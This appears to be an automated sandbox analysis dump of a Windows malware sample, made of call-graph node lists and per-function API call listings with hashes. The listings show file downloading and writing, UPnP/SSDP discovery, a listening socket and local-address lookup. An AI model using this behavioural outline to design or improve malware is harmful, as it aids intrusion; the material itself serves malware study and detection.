HeapFree 4851->4857 4852 404841 _invalid_parameter 4853 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4852->4853 4854 404867 _invalid_parameter 4852->4854 4853->4852 4855 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4854->4855 4856 40488d 4854->4856 4855->4854 4856->4807 4857->4851 4857->4852 4859 402820 _invalid_parameter 7 API calls 4858->4859 4860 403d7f _invalid_parameter 4859->4860 4861 403ca0 _invalid_parameter 9 API calls 4860->4861 4862 403db8 _invalid_parameter 4861->4862 4863 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4862->4863 4864 403de3 4862->4864 4863->4862 4864->4824 4866 40a2b2 4865->4866 4869 40a200 
4866->4869 4870 40a530 __aligned_recalloc_base 7 API calls 4869->4870 4872 40a210 4870->4872 4875 40a24c 4872->4875 4876 40809f 4872->4876 4878 409730 4872->4878 4885 409d20 4872->4885 4890 40a0f0 4872->4890 4874 40a740 _invalid_parameter 3 API calls 4874->4876 4875->4874 4876->4729 4879 409743 4878->4879 4880 409739 4878->4880 4879->4880 4881 409786 memset 4879->4881 4880->4872 4881->4880 4882 4097a7 4881->4882 4882->4880 4883 4097ad memcpy 4882->4883 4898 409500 4883->4898 4886 409d37 4885->4886 4889 409d2d 4885->4889 4887 409e2f memcpy 4886->4887 4886->4889 4903 409a50 4886->4903 4887->4886 4889->4872 4891 40a106 4890->4891 4896 40a0fc 4890->4896 4892 409a50 64 API calls 4891->4892 4891->4896 4893 40a187 4892->4893 4894 409500 6 API calls 4893->4894 4893->4896 4895 40a1a6 4894->4895 4895->4896 4897 40a1bb memcpy 4895->4897 4896->4872 4897->4896 4899 40954e 4898->4899 4901 40950e 4898->4901 4899->4880 4901->4899 4902 409440 6 API calls 4901->4902 4902->4901 4904 409a60 4903->4904 4905 409a6a 4903->4905 4904->4886 4905->4904 4913 409890 4905->4913 4908 409ba8 memcpy 4908->4904 4910 409bc7 memcpy 4911 409cf1 4910->4911 4912 409a50 62 API calls 4911->4912 4912->4904 4914 40989d 4913->4914 4915 4098a7 4913->4915 4914->4904 4914->4908 4914->4910 4915->4914 4917 409935 4915->4917 4918 409918 4915->4918 4923 409930 4915->4923 4919 409500 6 API calls 4917->4919 4921 409500 6 API calls 4918->4921 4919->4923 4921->4923 4922 4099dc memset 4922->4914 4924 4091f0 4923->4924 4925 409209 4924->4925 4933 4091ff 4924->4933 4926 4090c0 9 API calls 4925->4926 4925->4933 4927 409302 4926->4927 4928 40a530 __aligned_recalloc_base 7 API calls 4927->4928 4929 409351 4928->4929 4930 408f30 46 API calls 4929->4930 4929->4933 4931 40937e 4930->4931 4932 40a740 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4931->4932 4932->4933 4933->4914 4933->4922 4953 40a3e0 GetCurrentProcessId 4934->4953 4936 40a57b 4937 40a400 __aligned_recalloc_base 5 API calls 4936->4937 4942 40a587 
__aligned_recalloc_base 4936->4942 4937->4942 4938 405cb5 4938->4714 4938->4715 4939 40a680 _invalid_parameter HeapValidate 4939->4942 4940 40a630 HeapAlloc 4940->4942 4941 40a5fa HeapReAlloc 4941->4942 4942->4938 4942->4939 4942->4940 4942->4941 4943 40a740 _invalid_parameter 3 API calls 4942->4943 4943->4942 4947 40c72b 4944->4947 4945 40a530 __aligned_recalloc_base 7 API calls 4945->4947 4946 405d4d 4946->4715 4948 4072a0 4946->4948 4947->4945 4947->4946 4949 40a530 __aligned_recalloc_base 7 API calls 4948->4949 4950 4072b0 4949->4950 4951 4072f7 4950->4951 4952 4072bc memcpy CreateThread CloseHandle 4950->4952 4951->4715 4952->4951 4954 407300 4952->4954 4953->4936 4955 407371 4954->4955 4956 407311 4954->4956 4957 40737c DeleteUrlCacheEntry 4955->4957 4961 40736f 4955->4961 4960 407320 StrChrA 4956->4960 4956->4961 4963 407344 DeleteUrlCacheEntry 4956->4963 4958 40f070 64 API calls 4957->4958 4958->4961 4959 40a740 _invalid_parameter 3 API calls 4962 4073a6 4959->4962 4960->4956 4960->4963 4961->4959 4966 40f070 9 API calls 4963->4966 4967 40f133 InternetOpenUrlW 4966->4967 4968 40f29e InternetCloseHandle Sleep 4966->4968 4969 40f291 InternetCloseHandle 4967->4969 4970 40f162 CreateFileW 4967->4970 4971 40f2c5 7 API calls 4968->4971 4972 407359 Sleep 4968->4972 4969->4968 4973 40f191 InternetReadFile 4970->4973 4974 40f284 CloseHandle 4970->4974 4971->4972 4975 40f354 wsprintfW DeleteFileW Sleep 4971->4975 4972->4956 4976 40f1e4 CloseHandle wsprintfW DeleteFileW Sleep 4973->4976 4977 40f1b5 4973->4977 4974->4969 4978 40ed50 21 API calls 4975->4978 4996 40ed50 CreateFileW 4976->4996 4977->4976 4979 40f1be WriteFile 4977->4979 4981 40f394 4978->4981 4979->4973 4983 40f3d2 DeleteFileW 4981->4983 4984 40f39e Sleep 4981->4984 4983->4972 4987 40ef10 6 API calls 4984->4987 4985 40f277 DeleteFileW 4985->4974 4986 40f23b Sleep 4988 40ef10 6 API calls 4986->4988 4991 40f3b5 4987->4991 4989 40f252 4988->4989 4992 40f26e 4989->4992 4993 40f25d 4989->4993 4990 40f3d0 
4990->4972 4991->4990 4994 40f3c8 ExitProcess 4991->4994 4992->4974 4993->4992 4995 40f266 ExitProcess 4993->4995 4997 40ed95 CreateFileMappingW 4996->4997 4998 40eeaa 4996->4998 4999 40eea0 CloseHandle 4997->4999 5000 40edb6 MapViewOfFile 4997->5000 5001 40eeb0 CreateFileW 4998->5001 5010 40ef01 4998->5010 4999->4998 5002 40edd5 GetFileSize 5000->5002 5003 40ee96 CloseHandle 5000->5003 5004 40eed2 WriteFile CloseHandle 5001->5004 5005 40eef8 5001->5005 5006 40edf1 5002->5006 5007 40ee8c UnmapViewOfFile 5002->5007 5003->4999 5004->5005 5008 40a740 _invalid_parameter 3 API calls 5005->5008 5018 40cd80 5006->5018 5007->5003 5008->5010 5010->4985 5010->4986 5012 40c720 7 API calls 5013 40ee40 5012->5013 5013->5007 5014 40ee5d memcmp 5013->5014 5014->5007 5015 40ee79 5014->5015 5016 40a740 _invalid_parameter 3 API calls 5015->5016 5017 40ee82 5016->5017 5017->5007 5019 40c7b0 10 API calls 5018->5019 5020 40cda4 5019->5020 5020->5007 5020->5012 5022 40ddfe 5021->5022 5023 40dccd htons inet_addr setsockopt 5021->5023 5022->4492 5024 40b010 8 API calls 5023->5024 5025 40dd46 bind lstrlenA sendto ioctlsocket 5024->5025 5029 40dd9b 5025->5029 5026 40ddc2 5078 40b0d0 shutdown closesocket 5026->5078 5029->5026 5030 40a570 9 API calls 5029->5030 5069 40de20 5029->5069 5030->5029 5085 40e150 memset InternetCrackUrlA InternetOpenA 5031->5085 5034 40e02e 5034->4492 5036 40a740 _invalid_parameter 3 API calls 5036->5034 5040 40dffb 5040->5036 5043 40dff1 SysFreeString 5043->5040 5192 40afd0 inet_addr 5046->5192 5049 40b0bd 5054 40ea00 5049->5054 5050 40b06c connect 5051 40b080 getsockname 5050->5051 5052 40b0b4 5050->5052 5051->5052 5195 40b0d0 shutdown closesocket 5052->5195 5196 40afb0 inet_ntoa 5054->5196 5056 40ea16 5057 40cf80 11 API calls 5056->5057 5058 40ea35 5057->5058 5064 40dc5c 5058->5064 5197 40ea80 memset InternetCrackUrlA InternetOpenA 5058->5197 5061 40a740 _invalid_parameter 3 API calls 5063 40ea6c 5061->5063 5062 40a740 _invalid_parameter 3 API calls 5062->5064 
5063->5062 5064->4497 5068 40a864 5065->5068 5066 40a86a 5066->4488 5067 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5067->5068 5068->5066 5068->5067 5074 40de3c 5069->5074 5070 40df04 5070->5029 5071 40de58 recvfrom 5072 40de86 StrCmpNIA 5071->5072 5073 40de79 Sleep 5071->5073 5072->5074 5075 40dea5 StrStrIA 5072->5075 5073->5074 5074->5070 5074->5071 5075->5074 5076 40dec6 StrChrA 5075->5076 5079 40ce30 5076->5079 5078->5022 5080 40ce3b 5079->5080 5081 40ce41 lstrlenA 5080->5081 5082 40ce54 5080->5082 5083 40a530 __aligned_recalloc_base 7 API calls 5080->5083 5084 40ce70 memcpy 5080->5084 5081->5080 5081->5082 5082->5074 5083->5080 5084->5080 5084->5082 5086 40e1f1 InternetConnectA 5085->5086 5087 40df2a 5085->5087 5088 40e35a InternetCloseHandle 5086->5088 5089 40e22a HttpOpenRequestA 5086->5089 5087->5034 5098 40e040 5087->5098 5088->5087 5090 40e260 HttpSendRequestA 5089->5090 5091 40e34d InternetCloseHandle 5089->5091 5092 40e340 InternetCloseHandle 5090->5092 5093 40e27d 5090->5093 5091->5088 5092->5091 5094 40e2cb 5093->5094 5095 40e29e InternetReadFile 5093->5095 5096 40a570 9 API calls 5093->5096 5094->5092 5095->5093 5095->5094 5097 40e2e6 memcpy 5096->5097 5097->5093 5127 405630 5098->5127 5101 40df43 5101->5040 5108 40e9b0 5101->5108 5102 40e06a SysAllocString 5103 40e081 CoCreateInstance 5102->5103 5104 40e137 5102->5104 5105 40e12d SysFreeString 5103->5105 5107 40e0a6 5103->5107 5106 40a740 _invalid_parameter 3 API calls 5104->5106 5105->5104 5106->5101 5107->5105 5144 40e500 5108->5144 5111 40e380 5149 40e7d0 5111->5149 5116 40e930 6 API calls 5117 40e3d7 5116->5117 5123 40dfc2 5117->5123 5166 40e5f0 5117->5166 5120 40e40f 5120->5123 5171 40e4a0 5120->5171 5121 40e5f0 6 API calls 5121->5120 5123->5043 5124 40cf80 5123->5124 5187 40cef0 5124->5187 5132 40563d 5127->5132 5128 405643 lstrlenA 5130 405656 5128->5130 5128->5132 5130->5101 5130->5102 5131 40a530 __aligned_recalloc_base 7 API calls 5131->5132 5132->5128 5132->5130 
5132->5131 5134 40a740 _invalid_parameter 3 API calls 5132->5134 5135 4055d0 5132->5135 5139 405580 5132->5139 5134->5132 5136 4055e7 MultiByteToWideChar 5135->5136 5137 4055da lstrlenA 5135->5137 5138 40560c 5136->5138 5137->5136 5138->5132 5140 40558b 5139->5140 5141 405591 lstrlenA 5140->5141 5142 4055d0 2 API calls 5140->5142 5143 4055c7 5140->5143 5141->5140 5142->5140 5143->5132 5147 40e526 5144->5147 5145 40dfad 5145->5040 5145->5111 5146 40e5a3 lstrcmpiW 5146->5147 5148 40e5bb SysFreeString 5146->5148 5147->5145 5147->5146 5147->5148 5148->5147 5151 40e7f6 5149->5151 5150 40e39b 5150->5123 5161 40e930 5150->5161 5151->5150 5152 40e883 lstrcmpiW 5151->5152 5153 40e903 SysFreeString 5152->5153 5154 40e896 5152->5154 5153->5150 5155 40e4a0 2 API calls 5154->5155 5157 40e8a4 5155->5157 5156 40e8f5 5156->5153 5157->5153 5157->5156 5158 40e8d3 lstrcmpiW 5157->5158 5159 40e8e5 5158->5159 5160 40e8eb SysFreeString 5158->5160 5159->5160 5160->5156 5162 40e4a0 2 API calls 5161->5162 5164 40e94b 5162->5164 5163 40e3b9 5163->5116 5163->5123 5164->5163 5165 40e7d0 6 API calls 5164->5165 5165->5163 5167 40e4a0 2 API calls 5166->5167 5168 40e60b 5167->5168 5170 40e3f5 5168->5170 5175 40e670 5168->5175 5170->5120 5170->5121 5172 40e4c6 5171->5172 5173 40e4dd 5172->5173 5174 40e500 2 API calls 5172->5174 5173->5123 5174->5173 5176 40e696 5175->5176 5177 40e7ad 5176->5177 5178 40e723 lstrcmpiW 5176->5178 5177->5170 5179 40e7a3 SysFreeString 5178->5179 5180 40e736 5178->5180 5179->5177 5181 40e4a0 2 API calls 5180->5181 5183 40e744 5181->5183 5182 40e795 5182->5179 5183->5179 5183->5182 5184 40e773 lstrcmpiW 5183->5184 5185 40e785 5184->5185 5186 40e78b SysFreeString 5184->5186 5185->5186 5186->5182 5191 40cefd 5187->5191 5188 40cea0 _vscprintf wvsprintfA 5188->5191 5189 40cf18 SysFreeString 5189->5043 5190 40a570 9 API calls 5190->5191 5191->5188 5191->5189 5191->5190 5193 40affc socket 5192->5193 5194 40afe9 gethostbyname 5192->5194 5193->5049 5193->5050 5194->5193 
5195->5049 5196->5056 5198 40ea57 5197->5198 5199 40eb24 InternetConnectA 5197->5199 5198->5061 5198->5063 5200 40eca4 InternetCloseHandle 5199->5200 5201 40eb5d HttpOpenRequestA 5199->5201 5200->5198 5202 40eb93 HttpAddRequestHeadersA HttpSendRequestA 5201->5202 5203 40ec97 InternetCloseHandle 5201->5203 5204 40ec8a InternetCloseHandle 5202->5204 5207 40ebdd 5202->5207 5203->5200 5204->5203 5205 40ebf4 InternetReadFile 5206 40ec21 5205->5206 5205->5207 5206->5204 5207->5205 5207->5206 5208 40a570 9 API calls 5207->5208 5209 40ec3c memcpy 5208->5209 5209->5207 5216 406ff7 5210->5216 5211 407250 CoCreateInstance 5211->5216 5212 4071cb 5214 4071d4 SysFreeString 5212->5214 5215 406f9b SysFreeString 5212->5215 5213 40a740 _invalid_parameter 3 API calls 5213->5212 5214->5215 5215->4501 5216->5211 5217 407146 SysAllocString 5216->5217 5218 407012 5216->5218 5217->5216 5217->5218 5218->5212 5218->5213 5220 40c45a 5219->5220 5221 40c45e 5219->5221 5220->4507 5223 40c410 CryptAcquireContextW 5221->5223 5224 40c44b 5223->5224 5225 40c42d CryptGenRandom CryptReleaseContext 5223->5225 5224->5220 5225->5224 5226->4523 5278 40b360 gethostname 5227->5278 5230 40b449 5230->4523 5232 40b45c strcmp 5232->5230 5233 40b471 5232->5233 5282 40afb0 inet_ntoa 5233->5282 5235 40b47f strstr 5236 40b4d0 5235->5236 5237 40b48f 5235->5237 5283 40afb0 inet_ntoa 5236->5283 5285 40afb0 inet_ntoa 5237->5285 5240 40b49d strstr 5240->5230 5244 40b4ad 5240->5244 5241 40b4de strstr 5242 40b4ee 5241->5242 5243 40b52f 5241->5243 5287 40afb0 inet_ntoa 5242->5287 5284 40afb0 inet_ntoa 5243->5284 5286 40afb0 inet_ntoa 5244->5286 5248 40b4fc strstr 5248->5230 5251 40b50c 5248->5251 5249 40b53d strstr 5252 40b54d 5249->5252 5253 40b58e EnterCriticalSection 5249->5253 5250 40b4bb strstr 5250->5230 5250->5236 5288 40afb0 inet_ntoa 5251->5288 5289 40afb0 inet_ntoa 5252->5289 5258 40b5a6 5253->5258 5256 40b51a strstr 5256->5230 5256->5243 5257 40b55b strstr 5257->5230 5259 40b56b 5257->5259 5262 40b5d1 
5258->5262 5291 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5258->5291 5290 40afb0 inet_ntoa 5259->5290 5263 40b6ca LeaveCriticalSection 5262->5263 5265 40a320 7 API calls 5262->5265 5263->5230 5264 40b579 strstr 5264->5230 5264->5253 5266 40b615 5265->5266 5266->5263 5292 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5266->5292 5268 40b633 5269 40b660 5268->5269 5270 40b656 Sleep 5268->5270 5272 40b685 5268->5272 5271 40a740 _invalid_parameter 3 API calls 5269->5271 5270->5268 5271->5272 5272->5263 5293 40b110 5272->5293 5275 40b110 14 API calls 5274->5275 5276 40b103 LeaveCriticalSection 5275->5276 5276->4530 5277->4535 5279 40b387 gethostbyname 5278->5279 5280 40b3a3 5278->5280 5279->5280 5280->5230 5281 40afb0 inet_ntoa 5280->5281 5281->5232 5282->5235 5283->5241 5284->5249 5285->5240 5286->5250 5287->5248 5288->5256 5289->5257 5290->5264 5291->5262 5292->5268 5294 40b124 5293->5294 5301 40b11f 5293->5301 5295 40a530 __aligned_recalloc_base 7 API calls 5294->5295 5296 40b138 5295->5296 5297 40b194 CreateFileW 5296->5297 5296->5301 5298 40b1e3 InterlockedExchange 5297->5298 5299 40b1b7 WriteFile FlushFileBuffers CloseHandle 5297->5299 5300 40a740 _invalid_parameter 3 API calls 5298->5300 5299->5298 5300->5301 5301->5263 5305 40d7ed 5302->5305 5303 40d723 5303->4542 5303->4543 5304 40d811 WaitForSingleObject 5304->5305 5306 40d82c CloseHandle 5304->5306 5305->5303 5305->5304 5306->5305 5308 40d444 5307->5308 5310 40d460 WaitForSingleObject 5308->5310 5311 40d485 5308->5311 5374 40b790 EnterCriticalSection 5308->5374 5379 40d060 InterlockedExchangeAdd 5308->5379 5310->5308 5310->5311 5314 401f92 5313->5314 5319 402008 5313->5319 5315 401f97 WSAGetOverlappedResult 5314->5315 5562 401d60 5314->5562 5315->5314 5316 401fb9 WSAGetLastError 5315->5316 5316->5314 5318 401fd3 GetQueuedCompletionStatus 5318->5314 5318->5319 5603 4013b0 5320->5603 5322 40db70 5323 40b790 5 API calls 5324 40daed 5323->5324 5324->5322 5324->5323 5325 40db07 InterlockedExchangeAdd 
5324->5325 5326 40db4b WaitForSingleObject 5324->5326 5329 40bab0 18 API calls 5324->5329 5325->5324 5325->5326 5326->5324 5327 40db64 5326->5327 5616 401330 5327->5616 5329->5324 5656 401470 5331->5656 5333 40db94 5334 40dbc2 5333->5334 5335 40dba5 WaitForSingleObject 5333->5335 5336 401330 8 API calls 5335->5336 5337 40dbbf 5336->5337 5337->5334 5671 4021b0 5338->5671 5341 40d4d2 5342 40d4b5 WaitForSingleObject 5675 401600 5342->5675 5346 401ac9 5345->5346 5347 40194d WSAWaitForMultipleEvents 5345->5347 5348 4019f0 GetTickCount 5347->5348 5349 40196a WSAEnumNetworkEvents 5347->5349 5350 401a43 GetTickCount 5348->5350 5351 401a05 EnterCriticalSection 5348->5351 5349->5348 5364 401983 5349->5364 5352 401ab5 WaitForSingleObject 5350->5352 5353 401a4e EnterCriticalSection 5350->5353 5354 401a16 5351->5354 5355 401a3a LeaveCriticalSection 5351->5355 5352->5346 5352->5347 5356 401aa1 LeaveCriticalSection GetTickCount 5353->5356 5357 401a5f InterlockedExchangeAdd 5353->5357 5360 401a29 LeaveCriticalSection 5354->5360 5739 401820 5354->5739 5355->5352 5356->5352 5757 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5357->5757 5358 401992 accept 5358->5348 5358->5364 5360->5352 5363 401a72 5363->5356 5363->5357 5758 40b0d0 shutdown closesocket 5363->5758 5364->5348 5364->5358 5366 4019e9 5364->5366 5719 4022c0 5364->5719 5367 401cf0 7 API calls 5366->5367 5367->5348 5369 40b9b3 WaitForSingleObject 5368->5369 5370 40b9e1 5369->5370 5371 40b9cb InterlockedDecrement 5369->5371 5372 40b9da 5371->5372 5372->5369 5373 40b0f0 16 API calls 5372->5373 5373->5372 5375 40b7c7 LeaveCriticalSection 5374->5375 5376 40b7af 5374->5376 5375->5308 5377 40c450 3 API calls 5376->5377 5378 40b7ba 5377->5378 5378->5375 5380 40d07d 5379->5380 5390 40d076 5379->5390 5396 40d350 5380->5396 5383 40d09d InterlockedIncrement 5393 40d0a7 5383->5393 5385 40d0d0 5407 40afb0 inet_ntoa 5385->5407 5387 40d0dc 5388 40d1a0 InterlockedDecrement 5387->5388 5406 40b0d0 shutdown closesocket 5388->5406 

                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                • Part of subcall function 0040D6C0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D6DE
                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                              • setsockopt.WS2_32 ref: 004020D1
                                              • htons.WS2_32(?), ref: 00402101
                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                • Part of subcall function 0040D6F0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D6F0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                                • Part of subcall function 0040D6F0: DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                                • Part of subcall function 0040D6F0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                              • String ID:
                                              • API String ID: 1603358586-0
                                              • Opcode ID: 72ab33da5a46cba579dbb6cb68541ccf7241d57183c7f57f2b237d70ef746978
                                              • Instruction ID: 5f4ab44496f95361e3b7ac477a06260d9546e6561ad256066a099106afd7ac33
                                              • Opcode Fuzzy Hash: 72ab33da5a46cba579dbb6cb68541ccf7241d57183c7f57f2b237d70ef746978
                                              • Instruction Fuzzy Hash: 2B41C070640701BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA2D4E7F4E445875A

                                              APIs
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                              • htons.WS2_32(0000076C), ref: 0040DCF0
                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040B010: htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040B010: socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                                • Part of subcall function 0040B010: connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                                • Part of subcall function 0040B010: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                              • lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                              • sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DE20: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                                • Part of subcall function 0040DE20: Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                                • Part of subcall function 0040DE20: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                                • Part of subcall function 0040DE20: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                                • Part of subcall function 0040DE20: StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                              • String ID: 239.255.255.250
                                              • API String ID: 726339449-2186272203
                                              • Opcode ID: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction ID: 4840ad5dfb28dde6295409afe741e8bd11bfa900d245e54f0039e4319b19f377
                                              • Opcode Fuzzy Hash: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction Fuzzy Hash: 7C41D8B4E00208ABDB14DFE4E889BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                              • htons.WS2_32(?), ref: 00401508
                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                              • String ID:
                                              • API String ID: 4174406920-0
                                              • Opcode ID: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                              • Instruction ID: ab17557c7f530dee2ff78f8644a874c55f5dae77ec0fdd8d5eef9b2878869d10
                                              • Opcode Fuzzy Hash: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                              • Instruction Fuzzy Hash: 6031C871A44301AFE320DF649C46F9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040D292
                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D2B8
                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D2EF
                                              • GetTickCount.KERNEL32 ref: 0040D304
                                              • Sleep.KERNEL32(00000001), ref: 0040D324
                                              • GetTickCount.KERNEL32 ref: 0040D32A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick$Sleepioctlsocketrecv
                                              • String ID:
                                              • API String ID: 107502007-0
                                              • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction ID: 4b62ca25e6cdc7f9b2e1b521222d8c0dfc3b1f9d22396e6cb4543525420831ef
                                              • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction Fuzzy Hash: 1F31E874D00209EFCB14DFA8D948AEEB7B0FF44315F108669E825A7290D7749A94CB59
                                              APIs
                                              • htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040AFD0: inet_addr.WS2_32(0040B051), ref: 0040AFDA
                                                • Part of subcall function 0040AFD0: gethostbyname.WS2_32(?), ref: 0040AFED
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              Strings
                                              • www.update.microsoft.com, xrefs: 0040B047
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                              • String ID: www.update.microsoft.com
                                              • API String ID: 4063137541-1705189816
                                              • Opcode ID: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction ID: 0ae4650424ba83aa22eef998e17282091954cac8fd9820034268e2ac291e36ad
                                              • Opcode Fuzzy Hash: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction Fuzzy Hash: 4A212CB4D102099BDB04DFE4D946BEFBBB4AF08310F104169E515B7390E7745A44CBAA
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
